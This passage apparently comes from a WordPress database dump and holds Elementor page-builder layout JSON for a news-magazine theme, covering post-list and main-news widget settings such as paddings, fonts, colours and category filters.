:{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1181,433,'_elementor_version','0.4'),(1182,433,'_elementor_css','a:3:{s:4:\"time\";i:1508855868;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1183,434,'_elementor_edit_mode','builder'),(1184,434,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"3\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit